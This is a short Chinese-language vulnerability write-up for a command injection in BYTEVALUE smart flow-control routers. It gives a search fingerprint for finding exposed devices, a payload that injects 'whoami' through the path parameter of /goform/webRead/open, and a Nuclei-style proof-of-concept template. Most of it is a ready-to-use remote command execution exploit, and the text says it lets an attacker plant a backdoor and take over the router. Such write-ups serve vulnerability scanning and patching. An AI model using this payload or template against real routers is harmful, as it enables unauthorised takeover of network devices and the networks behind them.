【漏洞介绍】
百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
【指纹】
title=”BYTEVALUE 智能流控路由器”
【UI】
【payload】
/goform/webRead/open/?path=|whoami
【Poc】
id: BYTEVALUE-Rce
info:name: BYTEVALUE-Rceauthor: BYTEVALUE-Rceseverity: criticaltags: BYTEVALUEhttp:- raw:- |GET /goform/webRead/open/?path=|whoami HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedmatchers-condition: andmatchers:- type: wordwords:- "admin"- type: statusstatus:- 200